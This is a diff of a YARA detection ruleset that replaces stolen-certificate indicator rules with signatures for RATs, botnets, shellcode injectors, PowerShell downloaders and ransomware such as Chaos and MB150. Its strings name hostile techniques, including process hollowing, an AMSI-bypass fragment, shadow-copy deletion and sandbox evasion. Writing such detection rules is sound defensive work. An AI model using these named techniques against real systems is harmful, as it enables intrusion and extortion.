+                 (0a|0d 0a) 00 00 00 63 6f 6e 66 69 67 2e 74 78
+                 74 00 00 ff ff ff ff 03 00 00 00 68 74 61 }
+		$p1 = "-exclude" fullword
+		$p2 = "-makeff" fullword
+		$p3 = "-full" fullword
+		$p4 = "-nolocal" fullword
+		$p5 = "-nolan" fullword
+		$p6 = "\" -id \"" fullword
+		$p7 = "\" -wid \"" fullword
+		$p8 = "\"runas\"" fullword
+		$p9 = " -f -s -t 00" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Largos" and pe.signatures [ i ] . serial == "35:59:0e:be:4a:02:dc:23:31:7d:8c:e4:7a:94:7a:9b" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 6 of ( $p* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1F23F001458716D435Cca1A55D660Ec5 : FILE
+rule DITEKSHEN_MALWARE_Win_Deeprats : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DeepRats ("
 		author = "ditekSHen"
-		id = "16a904e4-bf1a-5530-9269-d92c0f1bb4d3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "5b774e24-3864-519f-9cfd-d729d7d567a0"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2339-L2350"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7188-L7218"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3e91429f7b25ad54103ee230a36d4b51060adb458b533b9cbd00178a02676629"
+		logic_hash = "511264c0b6932f90069a5206cd142ca7210b0bc40c51ef5aa9c41a161fb57aab"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "934d9357b6fb96f7fb8c461dd86824b3eed5f44a65c10383fe0be742c8c9b60e"
-		importance = 20
-
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ringen" and pe.signatures [ i ] . serial == "1f:23:f0:01:45:87:16:d4:35:cc:a1:a5:5d:66:0e:c5" )
-}
+		hash1 = "1f8b7e1b14869d119c5de1f05330094899bd997fca4c322d852db85cbd9271e6"
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00C2Fc83D458E653837Fcfc132C9B03062 : FILE
-{
-	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "fbc9420d-4670-502f-af6a-13d17fb73938"
-		date = "2020-11-19"
-		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2352-L2363"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "96ed5e78195f12cdc0316ed454ad4e2235253ed897905c4a97756b306933d874"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		thumbprint = "82294a7efa5208eb2344db420b9aeff317337a073c1a6b41b39dda549a94557e"
-		importance = 20
+	strings:
+		$s1 = "https://freegeoip.live/json/https://myexternalip.com/rawin" ascii
+		$s2 = "github.com/cretz/bine" ascii
+		$s3 = "github.com/kbinani/screenshot" ascii
+		$s4 = "socks5://%s:%d" ascii
+		$s5 = "socks5://%s:%s@%s:%d" ascii
+		$s6 = "http://%s:%d" ascii
+		$s7 = "http://%s@%s:%d" ascii
+		$s8 = "%SystemRoot%\\system32\\--CookieAuthentication" ascii
+		$s9 = "tor_addr_" ascii
+		$f1 = ".GetVnc" ascii
+		$f2 = ".GetCommand" ascii
+		$f3 = ".GetPayload" ascii
+		$f4 = ".ListenCommands" ascii
+		$f5 = ".ReceiveFile" ascii
+		$f6 = ".RegisterImplant" ascii
+		$f7 = ".Screenshot" ascii
+		$f8 = ".SendFile" ascii
+		$f9 = ".StartShell" ascii
+		$f10 = ".UnregisterImplant" ascii
+		$f11 = ".VncInstalled" ascii
+		$f12 = ".PingPong" ascii
+		$f13 = ".ListenCMD" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Vertical" and pe.signatures [ i ] . serial == "00:c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62" )
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or 8 of ( $f* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Fcb3D3519E66E5B6D90B8B595F558E81 : FILE
+rule DITEKSHEN_MALWARE_Win_Gasket : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Gasket"
 		author = "ditekSHen"
-		id = "966650b5-d776-5ed0-a99b-507b46abd882"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "3afa131d-9c88-50df-a3b4-552db4a84e69"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2365-L2376"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7220-L7250"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "62c7189cc906b9f2d2724492489218d9aecf08ef431463ebf1963b034222f2ad"
+		logic_hash = "0279979915891fc8c813ba555120ee5705b53b234a808b5ca77bff35a082e376"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "8bf6e51dfe209a2ca87da4c6b61d1e9a92e336e1a83372d7a568132af3ad0196"
-		importance = 20
+
+	strings:
+		$s1 = "main.checkGasket" ascii
+		$s2 = "main.connectGasket" ascii
+		$s3 = "/cert/trust/dev/stderr/dev/stdout/index.html" ascii
+		$f1 = ".SetPingHandler." ascii
+		$f2 = ".SetPongHandler." ascii
+		$f3 = ".computeMergeInfo." ascii
+		$f4 = ".computeDiscardInfo." ascii
+		$f5 = ".readPlatformMachineID." ascii
+		$f6 = ".(*Session).establishStream." ascii
+		$f7 = ".(*Session).handleGoAway." ascii
+		$f8 = ".(*Stream).processFlags." ascii
+		$f9 = ".(*Session).handlePing." ascii
+		$f10 = ".(*windowsService).Install." ascii
+		$f11 = ".(*windowsService).Uninstall." ascii
+		$f12 = ".(*windowsService).Status." ascii
+		$f13 = ".getStopTimeout." ascii
+		$f14 = ".DialContext." ascii
+		$f15 = ".WriteControl." ascii
+		$f16 = ".(*Server).authenticate." ascii
+		$f17 = ".(*Server).ServeConn." ascii
+		$f18 = ".(*TCPProxy).listen." ascii
+		$f19 = ".UserPassAuthenticator.Authenticate." ascii
+		$f20 = ".(*InfoPacket).XXX_" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pegasun" and pe.signatures [ i ] . serial == "fc:b3:d3:51:9e:66:e5:b6:d9:0b:8b:59:5f:55:8e:81" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 16 of ( $f* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4B03Cabe6A0481F17A2Dbeb9Aefad425 : FILE
+rule DITEKSHEN_MALWARE_Win_Silentmoon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SilentMoon"
 		author = "ditekSHen"
-		id = "3995296a-58ce-5615-8524-525698af3537"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "0b41a07b-0e2a-5bbf-8789-3b46460d2c09"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2378-L2389"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7252-L7272"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e3c0d68a65bc53b83a48310857605afda0004b4122201c18a66fea085a210924"
+		logic_hash = "1aa61e83d0003ef41d16fd40698485fdf41a957639ac3c3f2770994a43bd502a"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "2e86cb95aa7e4c1f396e236b41bb184787274bb286909b60790b98f713b58777"
-		importance = 20
+
+	strings:
+		$s1 = "\\\\.\\Global\\PIPE\\" fullword wide
+		$s2 = "REMOTE_NS:ERROR:%d" fullword ascii
+		$s3 = "REMOTE:ERROR:%d" fullword ascii
+		$s4 = "COMNAP,COMNODE,SQLQUERY,SPOOLSS,LLSRPC,browser" fullword wide
+		$s5 = "Mem alloc err" fullword ascii
+		$s6 = "block %d: crc = 0x%08x, combined CRC = 0x%08x, size = %d" ascii
+		$x1 = "ACTION:UNSUPPORTED" fullword ascii
+		$x2 = "?ServiceMain@@YAXKPAPA_W@Z" fullword ascii
+		$x3 = "?ServiceCtrlHandler@@YGKKKPAX0@Z" fullword ascii
+		$x4 = "%d socks, %d sorted, %d scanned" ascii
+		$x5 = "GoldenSky" fullword wide
+		$x6 = "SilentMoon" fullword wide
+		$x7 = "internalstoragerpc" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RASSVET, OOO" and pe.signatures [ i ] . serial == "4b:03:ca:be:6a:04:81:f1:7a:2d:be:b9:ae:fa:d4:25" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 3 of ( $x* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_539015999E304A5952985A994F9C3A53 : FILE
+rule DITEKSHEN_MALWARE_Win_Lu0Bot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Lu0Bot"
 		author = "ditekSHen"
-		id = "b53f5843-fb4c-5c61-be24-21bdbc445239"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "f8595553-b911-5e30-9ece-cad7d5913f19"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2391-L2402"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7274-L7285"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "72304761de1d5e81659487947a1cfa017f7f41d5639f18634db4dfd094980518"
+		logic_hash = "b4822248230a804b1dc75f8d517af28a621dab1746c9ef45eaa4754149ce0cba"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7731825aea38cfc77ba039a74417dd211abef2e16094072d8c2384af1093f575"
-		importance = 20
+
+	strings:
+		$s1 = "WinExec" fullword ascii
+		$s2 = "AlignRects" fullword ascii
+		$o1 = { be 00 20 40 00 89 f7 89 f0 81 c7 a? 01 00 00 81 }
+		$o2 = { 53 50 e8 b0 01 00 00 e9 99 01 00 00 e8 ae 01 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Service lab LLC" and pe.signatures [ i ] . serial == "53:90:15:99:9e:30:4a:59:52:98:5a:99:4f:9c:3a:53" )
+		uint16( 0 ) == 0x5a4d and filesize < 4KB and 1 of ( $s* ) and all of ( $o* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_016836311Fc39Fbb8E6F308Bb03Cc2B3 : FILE
+rule DITEKSHEN_MALWARE_Win_Shellcodedlei : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects shellcode downloader, executer, injector"
 		author = "ditekSHen"
-		id = "06cc9c38-c5a6-5311-8ceb-943ea3993fc7"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "62a4f141-87f8-596a-adf6-5bf9a50c9e91"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2404-L2415"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7287-L7304"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "912d490ac5d746c584e4dd5639be98d9577faba215cc1f8ebdf360581be53d5c"
+		logic_hash = "064c17427ae6b33ffb09a14abcb924d20ead44250e8bd03070bf40869f1c812e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "cab373e2d4672beacf4ca9c9baf75a2182a106cca5ea32f2fc2295848771a979"
-		importance = 20
+
+	strings:
+		$s1 = "PPidSpoof" fullword ascii
+		$s2 = "ProcHollowing" fullword ascii
+		$s3 = "CreateProcess" fullword ascii
+		$s4 = "DynamicCodeInject" fullword ascii
+		$s5 = "PPIDDynCodeInject" fullword ascii
+		$s6 = "MapAndStart" fullword ascii
+		$s7 = "PPIDAPCInject" fullword ascii
+		$s8 = "PPIDDLLInject" fullword ascii
+		$s9 = "CopyShellcode" fullword ascii
+		$s10 = "GetEntryFromBuffer" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SERVICE STREAM LIMITED" and pe.signatures [ i ] . serial == "01:68:36:31:1f:c3:9f:bb:8e:6f:30:8b:b0:3c:c2:b3" )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 5 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_009Bd81A9Adaf71F1Ff081C1F4A05D7Fd7 : FILE
+rule DITEKSHEN_MALWARE_Win_Bluebot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BlueBot"
 		author = "ditekSHen"
-		id = "deedbc3a-8c77-5c2c-b3c1-40e5d082ec5a"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "cddd40bb-c3c6-5c44-9cb1-480571375be8"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2417-L2428"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7306-L7333"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "85efd10f6c49b93215c9f8f97915c62fb3ed3bb158b2137e953022b550263726"
+		logic_hash = "04a19f649eb2fff7a5bc59ccead80cd0a04c4e5418cbc83e850045dba75b03e0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "885b9f1306850a87598e5230fcae71282042b74e8a14cabb0a904c559b506acb"
-		importance = 20
+
+	strings:
+		$x1 = "Blue_Botnet" wide
+		$x2 = "5-START-http" ascii
+		$x3 = "*300-END-" ascii
+		$x4 = "botlogger.php" wide
+		$s1 = "//TARGET//" wide
+		$s2 = "//BLOG//" wide
+		$s3 = "MCBOTALPHA" wide
+		$s4 = "//IPLIST//" wide
+		$s5 = "Host: //BLOG//" wide
+		$s6 = "User-Agent: //USERAGENT//" wide
+		$s7 = "<string>//TARGET//</string>" wide
+		$s8 = "POST //URL// HTTP/1.1/r/n" wide
+		$v1 = "<attack>b__" ascii
+		$v2 = "PressData" fullword ascii
+		$v3 = "POSTPiece" fullword ascii
+		$v4 = /(load|tcp|udp)Stuff/ fullword ascii
+		$v5 = "isAttacking" fullword ascii
+		$v6 = "DoSAttack" fullword ascii
+		$v7 = "prv_attack" fullword ascii
+		$v8 = "blogList" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMART TOYS AND GAMES" and pe.signatures [ i ] . serial == "00:9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 5 of ( $s* ) or 5 of ( $v* ) or 9 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_082023879112289Bf351D297Cc8Efcfc : FILE
+rule DITEKSHEN_MALWARE_Win_Unkcobaltstrike : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown malware, potentially CobaltStrike related"
 		author = "ditekSHen"
-		id = "292f99be-2eb0-5ad1-bd07-766de7822f1e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "24ddccc7-3700-57a1-999c-ddefae6911bb"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2430-L2441"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7335-L7354"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0747b37139daaba10a17098aeb0c6246290fbd997345de34ce9de8da26d7db05"
+		logic_hash = "2fb4e87eec3b56773b812ce6a5c28143183087e0f93d92d76c1103563f8e0891"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0eb3382177f26e122e44ddd74df262a45ebe8261029bc21b411958a07b06278a"
-		importance = 20
+
+	strings:
+		$s1 = "https://%hu.%hu.%hu.%hu:%u" ascii wide
+		$s2 = "https://microsoft.com/telemetry/update.exe" ascii wide
+		$s3 = "\\System32\\rundll32.exe" ascii wide
+		$s4 = "api.opennicproject.org" ascii wide
+		$s5 = "%s %s,%s %u" ascii wide
+		$s6 = "User32.d?" ascii wide
+		$s7 = "StrDupA" fullword ascii wide
+		$s8 = "{6d4feed8-18fd-43eb-b5c4-696ad06fac1e}" ascii wide
+		$s9 = "{ac41592a-3d21-46b7-8f21-24de30531656}" ascii wide
+		$s10 = "bd526:3b.4e32.57c8.9g32.35ef41642767~" ascii wide
+		$s11 = { 4b d3 91 49 a1 80 91 42 83 b6 33 28 36 6b 90 97 }
+		$s12 = { 0d 4c e3 5c c9 0d 1f 4c 89 7c da a1 b7 8c ee 7c }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "08:20:23:87:91:12:28:9b:f3:51:d2:97:cc:8e:fc:fc" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ece6Cbf67Dc41635A5E5D075F286Af23 : FILE
+rule DITEKSHEN_MALWARE_Win_EXEPWSHDL : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executable downloaders using PowerShell"
 		author = "ditekSHen"
-		id = "53312007-179d-547c-8195-0b5d78181300"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "1e5a414b-e81e-5915-b00b-75edbfcc32d2"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2443-L2454"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7356-L7374"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "27ecc138f8d574c15095032c35ad51c00d8b98f21162d1f59f1f9ca9e5b54391"
+		logic_hash = "58fbd27758ecd435eb30b7c34f4cf142db8e31edee0838175992923a51706508"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "f1f83c96ab00dcb70c0231d946b6fbd6a01e2c94e8f9f30352bbe50e89a9a51c"
-		importance = 20
+
+	strings:
+		$x1 = "[Ref].Assembly.GetType(" ascii wide
+		$x2 = ".SetValue($null,$true)" ascii wide
+		$s1 = "replace" ascii wide
+		$s2 = "=@(" ascii wide
+		$s3 = "[System.Text.Encoding]::" ascii wide
+		$s4 = ".substring" ascii wide
+		$s5 = "FromBase64String" ascii wide
+		$d1 = "New-Object" ascii wide
+		$d2 = "Microsoft.XMLHTTP" ascii wide
+		$d3 = ".open(" ascii wide
+		$d4 = ".send(" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THRANE AGENTUR ApS" and pe.signatures [ i ] . serial == "00:ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23" )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of ( $x* ) and ( 3 of ( $s* ) or all of ( $d* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5Fb6Bae8834Edd8D3D58818Edc86D7D7 : FILE
+rule DITEKSHEN_MALWARE_Win_MB150 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects MB150? Go ransomware"
 		author = "ditekSHen"
-		id = "65f5e05c-f5cd-53ba-b4ec-7f412aa63796"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "9688974b-ccf9-59ea-bb31-e46c63f021bf"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2456-L2467"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7376-L7402"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9cec6eae024d738c68d670fb61f7667bdc156245da83e5d0ae0f2012baa5bc0a"
+		logic_hash = "a07535fc53912ddde6a0bed187c21ecdb2701d317d7de0cbdd2db37071bc9a21"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "026868bbc22c6a37094851e0c6f372da90a8776b01f024badb03033706828088"
-		importance = 20
+
+	strings:
+		$x1 = /main\.evade_(clicks_count|cpu_count|disk_size|foreground_window|hostname|mac|printer|screen_size|system_memory|time_acceleration|tmp|utc)/ fullword ascii
+		$x2 = /main\.sandbox_(hostname|mac_addresses)/ fullword ascii
+		$x3 = "main.drop_ransom_note" fullword ascii
+		$x4 = "main.ransom_amount" fullword ascii
+		$x5 = "main.create_encryption_key" fullword ascii
+		$x6 = "main.encrypt" fullword ascii
+		$x7 = "main.encrypt_encryption_key" fullword ascii
+		$x8 = "main.encrypt_file" fullword ascii
+		$x9 = "main.ext_blacklist" fullword ascii
+		$mac1 = "00:03:FF00:05:6900:0C:2900:16:3E00:1C:1400:1C:4200:50:56" ascii nocase
+		$mac2 = "00-03-FF00-05-6900-0C-2900-16-3E00-1C-1400-1C-4200-50-56" ascii nocase
+		$mac3 = "0003FF000569000C2900163E001C14001C42005056" ascii nocase
+		$go = "Go build ID:" ascii
+		$s1 = "main.MB150" ascii
+		$s2 = "http://1.1.1.1" ascii
+		$s3 = "your personnal ID" ascii
+		$s4 = "ransom amount" ascii
+		$s5 = "binance.com" ascii
+		$s6 = "getmonero.org" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tramplink LLC" and pe.signatures [ i ] . serial == "5f:b6:ba:e8:83:4e:dd:8d:3d:58:81:8e:dc:86:d7:d7" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or ( $go and 4 of ( $s* ) ) or ( 1 of ( $mac* ) and ( 2 of ( $x* ) or 3 of ( $s* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6E0Ccbdfb4777E10Ea6221B90Dc350C2 : FILE
+rule DITEKSHEN_MALWARE_Win_Chaos : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Chaos ransomware"
 		author = "ditekSHen"
-		id = "c8f66f21-db29-5a5d-a74d-58c152a17bc3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "59d43cfb-72d8-5c17-87bf-f1f364d23bed"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2469-L2480"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7404-L7433"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fee9662133f0a3d88ce97c27f150bcea8faf21b4c4b97f90bb2aae73ee332bb9"
+		logic_hash = "6203ab09745db817b9e909d70cf1d5be9769c414461ee5f7bb344b6959986537"
 		score = 75
-		quality = 75
+		quality = 44
 		tags = "FILE"
-		thumbprint = "367b3092fbcd132efdbebabdc7240e29e3c91366f78137a27177315d32a926b9"
-		importance = 20
 
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRAUMALAB INTERNATIONAL APS" and pe.signatures [ i ] . serial == "6e:0c:cb:df:b4:77:7e:10:ea:62:21:b9:0d:c3:50:c2" )
+	strings:
+		$s1 = "<EncyptedKey>" fullword wide
+		$s2 = "<EncryptedKey>" fullword wide
+		$s3 = "C:\\Users\\" fullword wide
+		$s4 = "read_it.txt" fullword wide
+		$s5 = "#base64Image" fullword wide
+		$s6 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" fullword wide
+		$s7 = /check(Spread|Sleep|AdminPrivilage|deleteShadowCopies|disableRecoveryMode|deleteBackupCatalog)/ fullword ascii nocase
+		$s8 = /(delete|disable)(ShadowCopies|RecoveryMode|BackupCatalog)/ fullword ascii nocase
+		$s9 = "spreadName" fullword ascii
+		$s10 = "processName" fullword ascii
+		$s11 = "sleepOutOfTempFolder" fullword ascii
+		$s12 = "AlreadyRunning" fullword ascii
+		$s13 = "random_bytes" fullword ascii
+		$s14 = "encryptDirectory" fullword ascii nocase
+		$s15 = "EncryptFile" fullword ascii nocase
+		$s16 = "intpreclp" fullword ascii
+		$s17 = "bytesToBeEncrypted" fullword ascii
+		$s18 = "textToEncrypt" fullword ascii
+		$m1 = "Chaos is" wide
+		$m2 = "Payment informationAmount:" wide
+		$m3 = "Coinmama - hxxps://www.coinmama.com Bitpanda - hxxps://www.bitpanda.com" wide
+		$m4 = "where do I get Bitcoin" wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and 6 of ( $s* ) or all of ( $m* ) or ( 2 of ( $m* ) and 4 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1249Aa2Ada4967969B71Ce63Bf187C38 : FILE
+rule DITEKSHEN_MALWARE_Win_Horuseyesrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects HorusEyesRAT"
 		author = "ditekSHen"
-		id = "3af35255-7583-5463-b130-ebc8abd4803b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "80b2fd11-f8b4-5aee-b55a-4f7ee9fad6cf"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2482-L2493"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7435-L7451"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9f8ff46a3b0f5179c2c3b89e82188183fa399c67c3f0ebc28218cf3cb4ce5c70"
+		logic_hash = "c0f499e3a17923b391ed6b7fa723525a9d4aef0ce04a2c7abec60d5eda15888f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "c139076033e8391c85ba05508c4017736a8a7d9c1350e6b5996dd94b374f403c"
-		importance = 20
+
+	strings:
